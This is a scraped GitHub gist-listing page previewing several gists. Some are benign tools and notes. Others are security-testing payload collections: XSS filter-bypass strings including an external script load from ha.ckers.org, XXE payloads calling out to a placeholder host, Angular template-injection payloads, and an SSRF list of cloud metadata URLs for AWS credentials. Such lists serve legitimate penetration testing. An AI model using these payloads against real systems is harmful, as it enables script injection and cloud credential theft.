Skip to content

Instantly share code, notes, and snippets.

View blacknon's full-sized avatar

blacknon

62 followers · 22 following
View GitHub Profile
@chriswayg
chriswayg / create-cloud-template.sh
Last active May 1, 2024 20:47
This script will download a cloud image of many Linux distros and create a Proxmox 6 KVM template from it.
#!/bin/bash
set -o errexit
clear
printf "\n*** This script will download a cloud image and create a Proxmox VM template from it. ***\n\n"
### HOW TO USE
### Pre-req:
### - run on a Proxmox 6 server
### - a dhcp server should be active on vmbr1
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active May 1, 2024 03:25
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@staaldraad
staaldraad / XXE_payloads
Last active April 29, 2024 14:27
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@mhmdiaa
mhmdiaa / waybackurls.py
Last active April 29, 2024 08:05
import requests
import sys
import json
def waybackurls(host, with_subs):
if with_subs:
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
else:
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
@yowu
yowu / HttpProxy.go
Last active April 27, 2024 20:17
A simple HTTP proxy by Golang
package main
import (
"flag"
"io"
"log"
"net"
"net/http"
"strings"
)
@rosylilly
rosylilly / gist:3401612
Created August 20, 2012 06:40
先輩と覚える HTTP ステータスコード

先輩に学ぶ HTTP Status Code

超雑にまとめました。修正してください。

登場人物

  • アプリケーション先輩: いつも忙しい。横に広がるのが得意(デブじゃない)。
  • 後輩: 頼んでばっかしで役に立たない。
  • サーバー先輩: アプリケーション先輩と仲がいい。Unix Socket でつながるくらい仲良し。
  • プロクシ先輩: アプリケーション先輩とかサーバー先輩と後輩の間を取り持って代わりに伝えたりしてくれる。たまに勝手にレスポンスを書き換える。
@mccabe615
mccabe615 / AngularTI.md
Last active April 18, 2024 11:37
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@BuffaloWill
BuffaloWill / cloud_metadata.txt
Last active April 16, 2024 04:15
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@sloanlance
sloanlance / jq_tsv_conversion.md
Last active April 12, 2024 04:33
jq: JSONL → TSV conversion

jq: JSONL → TSV conversion

What is TSV?

TSV means "tab-separated values". I prefer this format over CSV ("comma-separated values") because it doesn't require as much quoting. Many programs that can use CSV formatted data can also use TSV, although they may need to be explicitly told of the different format if it's not detected automatically.

However, in any of the jq scripts below, "@tsv" can usually be replaced with "@csv" to get CSV output instead.

@XVilka
XVilka / TrueColour.md
Last active April 8, 2024 14:02
True Colour (16 million colours) support in various terminal applications and terminals

THIS GIST WAS MOVED TO TERMSTANDARD/COLORS REPOSITORY.

PLEASE ASK YOUR QUESTIONS OR ADD ANY SUGGESTIONS AS A REPOSITORY ISSUES OR PULL REQUESTS INSTEAD!